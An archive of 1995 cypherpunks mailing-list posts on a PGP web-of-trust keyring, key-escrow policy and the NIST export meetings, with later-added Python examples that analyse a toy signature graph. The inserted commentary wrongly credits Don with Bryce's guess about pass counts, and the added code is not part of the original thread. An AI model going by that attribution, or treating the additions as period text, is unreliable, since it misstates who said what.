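    print("cut off without A:", sorted(cut_off_by(SIGS, SEEDS, ring, {"A"})))
```

Running it reproduces the asymmetry Don points out: `NOBODY` is excluded by the signer-only rule and appears only after the expansion, while `X` and `Y` stay out under both rules because nothing connects them to the seed. `hop_distances` gives the hop count to the seed (5 here, one less than the number of passes, matching Don's "13 passes means a chain of 12"), and `cut_off_by` shows that removing the single key `A` strands everything below it, the kind of fragility that mutual signatures would reduce.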
From don at cs.byu.edu Fri Sep 8 00:26:07 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Fri, 8 Sep 95 00:26:07 PDT
Subject: Announce: Web of Trust Ring
Message-ID: <199509072300.RAA00742@wero.byu.edu>

-----BEGIN PGP SIGNED MESSAGE-----

First: after mailing myself the file in 16k chunks... the ring is up, and intact. The only difference from what the original was supposed to be is that both of my keys are now assigned a trust of unknown instead of undefined. *shrug*

From: Bryce Wilcox
>A very interesting project! Can you give us some data like how many is the
>maximum number of hops necessary to connect two people on the WoT? (I am
>aware that one wouldn't want to trust such a connection, and that PGP
>doesn't actually allow you to do so for hops > 2...)

My original message details the brute-force approach I took, and the imperfections that it entails. If everybody who signed a key received a signature back from the same person, the ring I generated really would be "The" WoT. (I don't mean to center on "my ring" versus local WoTs that people have, but I centered around Warlord, Zimmermann, and Jeff S., and seeing as how those happen to be keys that come with PGP, that's where I'd imagine most people would start looking.)

Unfortunately, there are a lot of nobodies included just because they signed someone else's key. For the same reason, someone who was signed by a well-known key, but didn't sign back, and didn't sign anybody else's key who was included, didn't make it to the ring. Imperfections aside, the ring is 4.5 meg smaller than the unimi keyring, which makes it Pretty Good[tm]. (ha ha)

I forgot to mention it before, but this keyring is most accurately described as a keyring full of some of the people who are more relevant to the Web of Trust than lots of the people who aren't in the keyring.

PGP lets you define how many levels of trust you want. Due to the way in which the ring was constructed, I'd guess that the longest chain could not be longer than 6-8 keys.

>(P.S. I guess "12" based on the number of passes necessary. That seems
>like a really high number to me...)

No kidding. I ran the program with high priority most of the time, but I was doing it on my home 386... Hence the 4-6 hour runtimes per pass.

>Are any obvious pseudonyms in? (I would guess not.)

YEEEEEEESSSSSSS, there are. (Hint: check for @whitehouse.gov)

>I wonder what sorts of statistical analyses could be done on this WoT?

It's still full of _nobodies_ who only got in because they signed a known key of someone they never met and mailed it to a keyserver. Unfortunately, I don't have the technical abilities to check for mutual signatures, or only include keys that are signed by someone already in the WoT. That's _my_ expert statistical analysis...

>Is it fairly evenly spread out or are there noticeably larger "clumps" of
>mutual signatures? How many keys *are* there in this (subset of the) WoT?

There's a couple people that have half a zillion sigs. Many people have signed someone else's key but have no one else's sig on their own.

>Here's a question: for two randomly selected members of your WoT, how many
>signatures would a Man In The Middle have to fake in order to isolate
>the one member from the other?

If we talk about the WoT instead of the WoN (web of nobodies) then I would guess faking 2-3 specific (attacker-chosen) people would cut off a good share of the keys, 4-5 for many more, and about 500 (ok, maybe only 15-25) for some of the well connected people. For jargon's sake we can call those the Dial-up, the ISDN and the T3 people respectively.

>Thanks for this, Don.

:)

- -Don the Dialup

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME95P8La+QKZS485AQHmHQMAs0UXaSan5PWDfppPU1WCNuz7eiXgpxeS
Y+2vHc1ZofT+Mq99Y2+aMgZGPasowQ/zdLIf4mNLZR1QNEf7eUf9wCLXY2fH5REw
t4uwpvRlz9TkkaUbwSmW+kBXept8H7WE
=8kPL
-----END PGP SIGNATURE-----

From goedel at tezcat.com Fri Sep 8 02:06:18 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Fri, 8 Sep 95 02:06:18 PDT
Subject: Why Key Escrow (GAK) is So Bad
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>At 10:22 9/7/95, Timothy C. May wrote:
>>(Ironically, I just heard about a case in Texas where a judge ordered a
>>mother to stop speaking in Spanish to her child at home, calling it "child
>>abuse." The implications of this are self-evident.)
>
>You have the facts slightly wrong. The order was no to stop talking Spanish
>and to use English but only to Not use Spanish EXCLUSIVELY but to also use
>English (so as to allow the Child to Grow up in a Bilingual Environment).
>Waiting until the child was old enough to go to school would put the Child
>at a disadvantage in learning English since the window of Chance for
>Language Skill Pickup would have closed.

(drifting wildly off topic...)

Consider me exhibit A that speaking only German in the home until age 17 does not diminish one's language skills. In fact, (drifting...) it was only until I began speaking English to the exclusion of German that my language skills began to decline.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFAVMnIf3YegbdiBAQGHEQJWLnmpNDvyxYnj92AB+nQXcR3ys0TorYVQ
EoIAJAi+hyARme8291R7Ky6PeCdGNXOlEVpdVchh2MO/rpgI/Zn1OwjaPMpFrFZd
1ph7
=M/sp
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet http://www.redweb.com/
Red Planet, L.L.C.| "Chess Space" /chess
1-800-RED 0 WEB | "MS Access Products" /cobre
Web Publishing | PGP Public Key /goedel/key.txt

From alano at teleport.com Fri Sep 8 02:10:18 1995
From: alano at teleport.com (Alan Olsen)
Date: Fri, 8 Sep 95 02:10:18 PDT
Subject: Key Escrow Papers via FTP
Message-ID: <199509080910.CAA04960@desiree.teleport.com>

The papers on Key Escrow scanned by John Young are available for FTP from:

ftp://ftp.teleport.com/pub/users/alano/nist.zip

They have been separated into separate text files (7 in all). I will have an HTML version available from my web page soon. (I am in the process of converting the text to something HTML-like.)

Comments/flames/etc can be sent my way, to John Young (jya at pipeline.com) and/or to /dev/null (davenull at netscape.com).

Enjoy!

| Visualize whirled keys | alano at teleport.com |
|"It's only half a keyserver. I had to split the | Disclaimer: |
|other half with the government man." - Black Art | Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|
| http://www.teleport.com/~alano | |

From frissell at panix.com Fri Sep 8 03:30:45 1995
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 8 Sep 95 03:30:45 PDT
Subject: Legality of Cash Transactions
In-Reply-To:
Message-ID:

On Thu, 7 Sep 1995, Timothy C. May wrote:

> Try buying a car with cash, especially a car costing over $10,000.
>
> Black Unicorn posted an account a while back (sometime last year) of his
> efforts to pay cash for a new car.

It occurred to me that the four cars I've bought in my life have been paid for in cash. Of course my taste for 10-year-old cars makes it easier to keep the price under $10,000. Indeed, I think the most I've ever paid was less than $3100.

DCF

"Too bad for Packwood he didn't hack two people to death with a knife. He might have gotten off."
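Going back to Don's "Web of Trust Ring" post above: the questions Bryce raised (how many hops connect two members, whether mutual signatures can be checked, whether keys should only be admitted when signed by someone already in the web, and how many signatures a man-in-the-middle would have to fake to isolate one member from another) are all questions about a directed graph of signatures. The following is an added example, not code from the thread, from Don's ring-building program or from PGP. The keyring it works on is a constructed toy: `SIGNATURES` maps each (hypothetical) key name to the set of keys it has signed. It implements the three inclusion rules discussed (Don's "anyone who signed a member gets in", the stricter "only keys signed by a member", and "mutual signatures only"), counts the passes a closure takes, measures hop distance, and computes the minimum number of mutual-signature links whose removal separates two members (the edge-cut dual of "how many links must be faked").

```python
"""Trust-path analysis over a constructed PGP-style signature graph.

Added example, not code from the cypherpunks thread or from PGP. All key
names are hypothetical. SIGNATURES maps each key to the keys it has signed.
"""
from collections import deque

# Constructed sample keyring: key -> set of keys it has signed.
SIGNATURES = {
    "seed_a": {"alice", "bob"},
    "seed_b": {"bob", "carol"},
    "alice": {"seed_a", "dave", "bob"},
    "bob": {"seed_a", "seed_b", "carol", "alice"},
    "carol": {"bob", "seed_b", "erin"},
    "dave": {"alice"},
    "erin": set(),             # signed by carol, never signed anyone back
    "nobody1": {"seed_a"},     # signed a well-known key, nobody signed it
    "nobody2": {"nobody1"},
}
SEEDS = {"seed_a", "seed_b"}   # stand-ins for the well-known starting keys


def reverse(sigs):
    """key -> set of keys that signed it (the 'who signed me' relation)."""
    rev = {k: set() for k in sigs}
    for signer, signed in sigs.items():
        for k in signed:
            rev.setdefault(k, set()).add(signer)
    return rev


def mutual(sigs):
    """Undirected adjacency keeping only pairs that signed each other."""
    return {k: {o for o in outs if k in sigs.get(o, ())}
            for k, outs in sigs.items()}


def closure(adj, seeds):
    """Pass-by-pass closure: each pass admits every adj-neighbour of an
    already admitted key. Returns (members, passes). The pass count is the
    longest chain from the seeds plus the final pass that admits nothing.

    closure(reverse(sigs), seeds)  -> Don's rule: signing a member gets you in
    closure(sigs, seeds)           -> only keys signed by a member get in
    closure(mutual(sigs), seeds)   -> mutual signatures only
    """
    ring, passes = set(seeds), 0
    while True:
        passes += 1
        added = {n for k in ring for n in adj.get(k, ()) if n not in ring}
        if not added:
            return ring, passes
        ring |= added


def hops(adj, sources):
    """BFS hop distance from the nearest source to every reachable key."""
    dist = {s: 0 for s in sources}
    queue = deque(dist)
    while queue:
        k = queue.popleft()
        for n in adj.get(k, ()):
            if n not in dist:
                dist[n] = dist[k] + 1
                queue.append(n)
    return dist


def min_edge_cut(adj, s, t):
    """Minimum number of (undirected) signature links whose removal separates
    s from t, computed as the maximum number of edge-disjoint s-t paths
    (Menger's theorem) with unit-capacity augmenting paths. `net` holds the
    net flow per directed arc; an undirected link has capacity 1 each way."""
    net, paths = {}, 0
    while True:
        parent, queue = {s: None}, deque([s])
        while queue and t not in parent:
            u = queue.popleft()
            for v in adj.get(u, ()):
                if v not in parent and 1 - net.get((u, v), 0) > 0:
                    parent[v] = u
                    queue.append(v)
        if t not in parent:
            return paths
        v = t
        while parent[v] is not None:           # push one unit along the path
            u = parent[v]
            net[(u, v)] = net.get((u, v), 0) + 1
            net[(v, u)] = net.get((v, u), 0) - 1
            v = u
        paths += 1


if __name__ == "__main__":
    dons_ring, p = closure(reverse(SIGNATURES), SEEDS)
    print("Don's rule admits", sorted(dons_ring), "in", p, "passes")
    strict, p = closure(SIGNATURES, SEEDS)
    print("signed-by-member rule admits", sorted(strict), "in", p, "passes")
    wot = mutual(SIGNATURES)
    members, p = closure(wot, SEEDS)
    print("mutual WoT:", sorted(members), "longest chain",
          max(hops(wot, SEEDS).values()), "passes", p)
    for a, b in (("dave", "carol"), ("seed_a", "carol")):
        print(f"links to cut between {a} and {b}:", min_edge_cut(wot, a, b))
```

On the toy keyring, Don's rule admits `nobody1` and `nobody2` (they signed a member) but excludes `erin` (signed by a member, never signed back), exactly the imperfection the post describes; the signed-by-member rule does the reverse; the mutual rule admits neither. The closure's pass count is one more than the longest chain from the seeds, which is why a high pass count implies a long chain. `dave`, with a single mutual link, is a "dial-up" key isolated by faking one link, while `seed_a` and `carol` need two.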
From pfarrell at netcom.com Fri Sep 8 03:33:25 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 03:33:25 PDT
Subject: NIST notes available
Message-ID: <199509081030.DAA06056@netcom3.netcom.com>

Thanks to John Young, I have placed the text of the handouts from Wednesday's and Thursday's meetings on my Nist pages.

url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

It is my belief that this meeting was a staged presentation. Nearly every industry representative said that this was a fatally flawed idea. It was "a non-starter." The government representatives said that they heard the comments, but insisted on proceeding.

The most depressing presentation was Thursday morning, made by a high level Dept of Justice flack. I'll have to dig out my notes, his name was Geoff G... He presented the usual drug dealer, pedophile and terrorist line, and added corrupt government officials. He pretended to talk about foreign bad guys. Nearly all were domestic. He clearly wants weak GAK so that he can decrypt anything domestically that he wants.

It is clear to me that the government intends that industry provide crippled encryption "for export" with the never stated expectation that since industry has repeatedly said that they want only one version of products, capable of being sold worldwide, that Domestic products will be crippled.

It is equally clear from representatives of IBM, Compaq, DEC, Lotus, and others that I talked to, that crypto product development will simply move offshore. Ireland, Israel, and Germany already have significant experience in developing commercial software. It is depressing to hear our Commerce department chasing technology and jobs overseas.

GAK is bad enough. Weak GAK makes me gag.

Pat

Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request #include standard.disclaimer

From asgaard at sos.sll.se Fri Sep 8 03:43:12 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 8 Sep 95 03:43:12 PDT
Subject: (changed) Criminals and Crypto
In-Reply-To: <199509080406.AAA25183@kanga.INS.CWRU.Edu>
Message-ID:

Tobin T Fricke wrote:

> I think that is a good point. Of course, if all non-escrowed
> encryption techniques were made illegal, then the criminals would
> just have another broken law under their belt if they used
> strong encryption. After all, an outlaw is an outlaw because
> he has broken laws, so what sense does it make to make more
> laws for him to break? Hmph.

Exactly. As someone recently pointed out, the practical result would only be to define a new class of single-crime criminals (cypherpunks/cyphercriminals). In my .se perspective this is emphasized by our penalty system. In the foreseeable future (10 years?) they would never get away with a harsher penalty for using un-GAKed crypto than a moderate fine. To 'real' criminals, who usually don't have open assets to forfeit (and the current praxis is then to forget about it after a few years) and no reputation as law-abiders to defend, it would be a joke, of course.

Mats

From danisch at ira.uka.de Fri Sep 8 05:09:39 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Fri, 8 Sep 95 05:09:39 PDT
Subject: fast modular reduction (proof?)
Message-ID: <9509081207.AA02681@elysion.iaks.ira.uka.de>

Oops, sorry for sending it twice. After the first mail I got an error message which said the mail wasn't delivered because it contained control characters. I thought the first mail didn't go out.

Hadmut :-(

From paul.elliott at hrnowl.lonestar.org Fri Sep 8 05:50:40 1995
From: paul.elliott at hrnowl.lonestar.org (Paul Elliott)
Date: Fri, 8 Sep 95 05:50:40 PDT
Subject: Cypher Rant II: Why Private Cryptography should not be regulated.
Message-ID: <30502bf1.flight@flight.hrnowl.lonestar.org>

-----BEGIN PGP SIGNED MESSAGE-----

CypherRant V2: Reasons why private cryptography should not be regulated.

Paul Elliott is solely responsible for this document. Please distribute widely.

FBI director Freeh has been going around pushing his stupid plans for cryptography regulation. Usually, these plans take the form of some kind of mandatory key escrow. Mandatory key escrow schemes are requirements that encryption keys be given to government agencies with the promise that the keys will not be used without a warrant. Now let me give some reasons why Freeh's requests should be ignored.

1) It is unconstitutional!

a) First amendment. Electronic communications are a form of speech and the cryptography regulations try to regulate this speech to a form the government understands.

Congress shall make NO LAW ....or abridging the freedom of speech or of the press; ...

They really meant it!

b) Second amendment. Cryptography is arms. Even U.S. government ITAR regulations admit this. Therefore cryptography is protected by Second amendment.

c) Ninth & tenth amendments. Article I section 8 does not give congress the power to tell us what computer software we can run on our computers. Therefore that power remains with us, and we should be able to run whatever cryptography software we want, the displeasure of congress notwithstanding.

d) The power to search, if a warrant exists, which is mentioned by the fourth amendment, does not grant the government the right to succeed in finding what it is looking for. In other words the power to search is not a power to guarantee a successful search. It is not a power to require citizens to run their lives in such a manner that any government search will be successful. For more information on this, see the following World Wide Web url:

http://www.clark.net/pub/cme/html/avss.html

Since all Senators and Congressmen take an oath to preserve and defend the constitution of the U.S., this should be the end of the argument. However, watching some of the stupid laws that have come out of congress in past years, tells me I should supplement the above with additional argument.

I am not a lawyer and I am not trying to be one. I have no opinion as to whether private cryptography regulations will be found unconstitutional. There are a number of cases where our courts have made decisions which do great violence to the plain meaning of the text of our constitution. Knowing what the courts will actually do is the business of lawyers. Understanding the constitution so that one may know what the courts should do should be the business of every citizen.

2) The excellent NRA argument "when guns are outlawed only outlaws will have guns" applies with equal force to cryptography! Professional criminals will circumvent with ease any government regulations on cryptography. Billions of bytes travel the internet yearly. The techniques of steganography make it absolutely trivial for any motivated person to conceal any encrypted messages. The Big Brother cryptography regulations will affect only ordinary citizens.

3) Cryptography is already in use by legitimate business. Any government regulation of cryptography will probably cost huge amounts of money for software and hardware costs for existing systems to be changed to a form that the government approves. The existing ITAR regulations probably cost the U.S. economy large amounts of money because U.S. companies can not market cryptography software internationally. For information, see:

http://www.eff.org/pub/Crypto/ITAR_export/tis_walker_export_101293_hr.testimony

By discouraging private cryptography, the ITAR regulations probably enable a large amount of computer crime since they make it difficult for people to protect themselves.

The ITAR regulations have not and cannot prevent strong cryptography from making it outside the U.S. How many tons of cocaine illegally enter the U.S. every year? Yet the government ITAR regulations propose to regulate the export of software that can fit in a shirt pocket, or travel by wire concealed with billions of bytes of data that leave the U.S. every year. It is time for the U.S. government to start living in the real world!

According to an article in the August 17, 1995 Wall Street Journal, ITAR regulations have required Netscape to use inferior encryption methods in the international version of its World Wide Web browser software. This inferior encryption method has actually been broken by a French Hacker! Because of its computational intensity, this weakness in the encryption method does not represent an immediate danger. However as more powerful computers continue to develop, this and similar vulnerabilities will present a danger for those who wish to use the internet for commerce. For more information, see:

http://pauillac.inria.fr/~doligez/ssl/

4) These regulations make it impossible for an individual to have greater privacy than the U.S. government. The Aldrich Ames case makes it clear that the U.S. is incompetent to keep a secret.

5) The proposed regulations require the American people trust the government, but on the contrary, the government should be required to trust the American people. Recent news stories (Waco etc.) make it clear that it is common for government agents to lie to get search warrants. Government should be viewed as George Washington did as "a fearful servant and a dangerous master". A recent poll conducted by the Americans Talk Issue Foundation said 76% of the people questioned responded that they rarely or never trust "government to do what is right". This mistrust is well founded. At the same time as administration sources were saying that key escrow schemes would remain voluntary, FBI, NSA, and DOJ experts were saying that the schemes must be made mandatory if they were to be at all effective. If the government is willing to lie to establish a key escrow system, what makes us believe that the government will not lie when applying for warrants to use that system? For more information on this, see:

http://www.efh.org/pgp/fbilie.html

If any key escrow system is adopted, the secret FISA court will undoubtedly be given the power to issue warrants for decryption keys. The FISA court has granted over 7,500 wiretap requests in complete secrecy with only one refusal. The secrecy of this court creates a great opportunity for abuse. If the court is lied to, the lie is not exposed, because the people with an interest in exposing the lie do not know the lie exists. If the court grants legally unwarranted warrants, there is no one to appeal or to try to stop the practice, because no one knows about the problem. For information, see:

http://MediaFilter.org/MFF/CAQ/caq53.court.html

6) It is too humiliating to require a free people to participate in the establishment of their own surveillance prisons. This is what key escrow requires. Consider the words of our revolutionary heritage:

Those who would sacrifice essential freedoms for temporary safety deserve neither.
Benjamin Franklin

If ye love wealth greater than liberty, the tranquility of servitude greater than the animating contest for freedom, go home from us in peace. We seek not your counsel, nor your arms. Crouch down and lick the hand that feeds you; and may posterity forget that ye were our countrymen.
Samuel Adams

Do you think that these men would approve the government's key escrow requests?

This information can also be found at the following url:

http://www.efh.org/pgp/rant.html

- --
Paul Elliott Telephone: 1-713-781-4543
Paul.Elliott at hrnowl.lonestar.org
Address: 3987 South Gessner #224 Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMFA5K/BUQYbUhJh5AQGOjAP+OyDEtAJGL32S8IK+HGAfaOTkpCI18SCL
QvSTaknPd5J2m+yzamGD88Z2YJKwW1M+2GgqGqsclCpI+KCvSp2Z9h1KXWT6ANGR
MXTuK3fjVmlvp5lqZAwHb133qL97e60MIq+5lK26FPaGzBCr7ckPMF0cvM+mm4dW
dyc1uuXaZg0=
=bVzd
-----END PGP SIGNATURE-----

From mfroomki at umiami.ir.miami.edu Fri Sep 8 06:39:02 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Fri, 8 Sep 95 06:39:02 PDT
Subject: Cypher Rant II: Why Private Cryptography should not be regulated.
In-Reply-To: <30502bf1.flight@flight.hrnowl.lonestar.org>
Message-ID:

forgive me for the advertisement, but I *am* a lawyer, and I think this well-intentioned rant gets some stuff wrong. If you want to know why I think this, visit my homepage and follow the link to my Clipper paper. Please note the homepage is a bit mobile right now; this address is temporary, but the next one should be stable.

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid.
Coral Gables, FL 33124 USA | See (soon to move to its real home):
http://www.law.miami.edu/~mfroomki

From pfarrell at netcom.com Fri Sep 8 06:39:12 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 06:39:12 PDT
Subject: Day 2, nist GAK meeting
Message-ID: <199509081336.GAA16190@netcom3.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

Date: Fri, 8 Sep 1995 09:32:43 -0400 (EDT)
From: "Pat Farrell"
To: cypherpunks at toad.com
Cc:
BCc:
Subject: Day 2 NIST meeting notes
X-NUPop-Charset: IBM 8-Bit

Thursday's GAK Export meeting started with reports from the prior afternoon's breakout meetings.
I reported on the session I was in, saying what I posted to the list yesterday (about National Semi's product, etc.) The other breakout groups reported their problems with the criteria, again asking that #9 be dropped, longer keys, etc.

The presentation for Group "A" was different. It was a speech. It asked that the process be stopped to let industry develop market-driven solutions. It was greeted by applause from the vendors and privacy advocates, with no reaction from the government representatives.

Randy Williams of Commerce, and Dan Cook of State, described the current export approval process. Lots of talk of jurisdictions and types of licenses. I quickly got lost in the jargon. The moderator wisecracked that the official language of the session was English. You couldn't tell from some of the exchanges.

They were questioned on import restrictions. Both Williams and Cook said that there are no import restrictions into the US. They also pointed out that Treasury, not State or Commerce, has jurisdiction over imports.

An engineer from Compaq asked a question: He said that his company buys licenses to software, and bundles it as "value added" to their systems. They are interested in bundling in security features. He asked if his computers would then be subject to export restrictions. The answer was yes. He asked if he could purchase security software overseas and import it. The answer was again yes. He asked if he could install that software on his computers, again yes. And export the computers, NO. They didn't even seem to think that this was illogical. So Commerce, State, and the rest of the government are actively encouraging the development of competing software industries in Israel, Germany and other countries. I hate to think what they'd do if they tried to hurt US industry.

An interesting tidbit came up after the session. In an offline conversation, the topic of "personal use export" came up. A reliable source said that revised regulations are being developed, and will be available soon. I explicitly asked if this meant "PGP on a notebook computer" and was told, Yes, that will be allowed; with the usual rules that it can't be for export, you can't be attempting to sell it, etc. Personal use, carry out and carry back. The "source" was asked if they had read Matt Blaze's personal use disaster story. The name didn't ring a bell, but the story was well known and considered a nightmare.

Penny Brummitt of NSA was to talk about Clipper's key escrow agents, but called in sick. I didn't catch the name of the replacement. He talked about Clipper's process, not as an example of what will be required for GAK agents, but as an "existence proof" that some agents can be found. The essence was that Clipper escrow facilities are strong, and staffed with people cleared to the "Secret" level. They also tossed out the phrase "US Person" in regard to the corporate entity that is responsible for the contract.

Geoff Greiveldinger, of the US Department of Justice, gave a frequently inaudible recounting of the evils of strong encryption in the war on D, P, & T, and also corrupt mayors. He was very personable. He also sounded like a fascist. Throughout the meeting, all sides tried to have a civil discussion, even though we disagreed. It was impossible to stay civil through his drivel. Ruby Ridge and Fuhrman had been unmentionable up until his speech. Mr. Greiveldinger said that acceptable escrow agents will be in the US. This caused considerable concern among vendors trying to sell in the International market.

Dan Weitzer of CDT (the EFF spinoff) gave a short, rousing speech. It was a call to arms. He said that since NIS&T was ignoring the consistent input from industry to stop this silly and stupid GAK, that we need to immediately contact our congresscritters.

Ken Mendelsen [sic?] of TIS gave a great speech. He suggested that the criteria for escrow agents be the same as the form to export tanks and other munitions. Then he showed the one page form used by State. He argued that legislative solutions to the escrow agent approval process will take too long and kill the effort. I'll try to get copies of his presentation.

F.W. Gerbracht, Jr a VP Merrill Lynch, represented the Securities Industry Association. He said that they are willing to work with the government, but they need long keys, strong ciphers, and international escrow agents. He used the phrase "unlimited algorithms and keyspace" as a requirement. They also need buy in from their regulators, and presented a long list of SEC, CFT, NYSE, NASDealers, and 50 state regulators, all who have to sign off.

Nanette DiTosto of Bankers Trust gave a short, to the point presentation. She said that BT has a commercial key escrow service, but that was not what she wanted to get across. She said that multinational banks demand strong encryption and non-US escrow agents. And that they would settle for nothing less.

A speaker from VTW gave a nice presentation. VTW is something like voter's telecommunications watch. They have a mailing list, at listproc at vtw.org. He said that escrow was doomed to failure. That there is no middle ground. I'll try to get his slides too.

Jack Wack of TECSEC gave a pitch for his shrinkwrapped product. He said it is exportable now, they've jumped through all the hoops. He also gave a great crack from his son. It went roughly like: "Dad, if you own the data before you encrypt it, how come the government says you don't own it after you encrypt it?" It brought down the house. (if someone has a more accurate quote, please let me have a copy).

Professor Hoffman of George Washington gave a great speech. He listed the Al Gore to Maria Cantwell letter's criteria, as a matrix. He then filled in the matrix with the Export GAK's criteria. It was painfully obvious that the NIST/NSA proposal didn't come close. He recommended that they focus closely on the Gore criteria, and come up with an approach that meets all the criteria.

While I planned on staying for the remainder of the meeting, a crisis came up at my day job. I can't say I was looking forward to more, a day and a half was enough for me, and I wasn't the only person leaving early. Attendance was down visibly Thursday relative to the first day.

Pat

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMFBGEbCsmOInW9opAQEfQgP+P/P0MRGe3EOElzM0UPQy+xce0XGe3wex
gfQdTrGWhL+FbYt/7taj6jgtcRg9zih1yQ3W+kN/VUXY9J4I1b6dw+j0sb6MkCjT
pShnflDI5OPQmmUq9KZlmy50u2yXuBqfWSdXd9NypjDsh7XDrWIqvqIcuT1cc/di
quNZ3u7aymw=
=oJC7
-----END PGP SIGNATURE-----

p.s. please let me know if this one's pgp sig is better than yesterday's

Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request #include standard.disclaimer

From akjoele at shiva.ee.siue.edu Fri Sep 8 07:12:45 1995
From: akjoele at shiva.ee.siue.edu (Arve Kjoelen)
Date: Fri, 8 Sep 95 07:12:45 PDT
Subject: ON OFF-TOPIC
Message-ID: <199509081412.JAA05507@shiva.ee.siue.edu>

On Thu, 7 Sep 1995 yihchun at saul3.u.washington.edu wrote:

> > Poor you, the only major political party to come out with a pro crypto
> > statement is a socialist party.
>I think the libertarian position is inherently pro-crypto.
>Besides, the French are socialist, and well, as far as crypto goes...

Wrong! First of all, Jacques Chiraq (French President) and the majority of the French parliament are conservatives. Secondly, a statement like "the French are Socialist" is an (untrue) generalization. You are probably thinking of Francois Mitterand ("socialist"), who became French President in the 80's, and the first French Socialist President ever.
Chiraq, by the way, is the genius behind the recommencement of Nuclear testing in French Polynesia "Test them in France if there's no risk of radioactive leakage" -Arve Kjoelen Southern Illinois University at Edwardsville From cme at TIS.COM Fri Sep 8 07:27:03 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 8 Sep 95 07:27:03 PDT Subject: Jimmy Upton's T-shirt (NIST's 9/6-7/95 meetings) Message-ID: <9509081402.AA09452@tis.com> The meetings included break-out groups, each of which had a moderator (mine was from NSA -- were they all?) and each of which had a recorder who would then report to the entire assembled group. Jimmy was a recorder once -- one of the last to report on the second day. Nearly every person speaking from industry started his remarks with the same disclaimer: My comments on these criteria should not be taken as an endorsement of the concept of key escrow Jimmy Upton, rather than start his report with that disclaimer, suggested that perhaps we should have T-shirts made for conference attendees stating: "My comments on these criteria...." The crowd broke up in laughter and applause. Speaking of applause -- the assembled audience was relatively passive through most of the presentation -- but whenever someone expressed opposition to the whole concept of GAK, the entire auditorium applauded. Specifically -- I was sitting near the civil liberties group (ACLU, EPIC, VTW, ...) and they applauded but it came from all over the auditorium. There were some who didn't -- the gov't folks, a few industry folks, .... - Carl P.S. I've put a few additions on my home page, in response to this meeting. +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! 
He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From nobody at REPLAY.COM Fri Sep 8 07:35:28 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 8 Sep 95 07:35:28 PDT Subject: Cryptography Global Challenges Message-ID: <199509081435.QAA06954@utopia.hacktic.nl> International Cryptography Institute 1995 Global Challenges Thursday-Friday September 21-22, 1995 Presented by The National Intellectual Property Law Institute 1815 Pennsylvania Ave., N.W. Washington, D.C. 20006 202-842-4800 Fax: (202) 296-4098 President James P. Chandler Emeritus Professor of Law _______________________________________________________ The International Cryptography Institute will address the cryptography challenges associated with meeting the information protection needs of users and the law enforcement and national security needs of nations. Topics to be covered include national and international cryptography policies and regulations, international requirements and approaches, commercial cryptography, privacy and trust, key escrow encryption, busines requirements, law enforcement requirements, and the use of cryptography with electronic payments. _______________________________________________________ Keynote Speaker FBI Director Louis J. Freeh _______________________________________________________ Program September 21, 1995 8:30-9:00 Welcome and Opening Remarks James Chandler, President, National Intellectual Property Law Institute Dorothy E. Denning, Chair of Program David Kahn, Visiting Historian, National Security Agency, U. S. 9:00-9:40 Cryptography in Business M. Blake Greenlee, U.S. 
9:40-10:20 Commercial Use of Cryptography Nick Mansfield, Shell International, The Netherlands 10:20-10:50 Break 10:50-11:20 Computer Industry Position on Privacy and Trust in an Information Society Yves Le Roux, Digital Equipment Corporation, France 11:20-12:00 The International Cryptography Experiment and Worldwide Cryptographic Products Survey David Balenson, Trusted Information Systems, Inc., U.S. 12:00-12:30 Export Controls on Encryption Software Ira Rubenstein, Microsoft Corp., U.S. 12:30-2:00 Lunch with Keynote Louis J. Freeh, Director, Federal Bureau of Investigation 2:00-3:00 Cryptography and the Information Society: Recent Developments in the European Union David J. Gould, Cabinet Office, UK 3:00-3:30 Encryption Policy and Technology in Japan Mitsuru Iwamura, The Bank of Japan, Japan 3:30-3:50 Break 3:50-4:30 Towards an Australian Policy on Encryption Peter Ford, Attomey General's Department, Australia 4:30-5:00 New National Encryption Policies and Regulations in Russia Anatoly Ledbeder, LAN Crypto Ltd., Russia 5:00-6:00 International Regulation of Cryptography: An Update James Chandler, National Intellectual Property Law Institute, US. 5:30-6:30 Reception _______________________________________________________ September 22 8:30-9:20 U.S. Government Cryptography Policy Michael R. Nelson, Office of Science and Technology Policy, US. Ronald D. Lee, National Security Agency, US. 9:20-10:10 Law Enforcement Requirements for Encryption William E. Baugh, Jr., Edward L. Allen, Michael D. Gilmore, Federal Bureau of Investigation, US. 10:10-10:40 Break 10:40-11:20 Intemational Key Escrow Encryption Dorothy E. Denning, Georgetown University, US. 11:20-12:00 Transnational Key Escrow Henry H. Perritt, Jr., Villanova University School of Law, US. 12:00-1:30 Lunch 1:30-3:00 Commercial and International Key Escrow 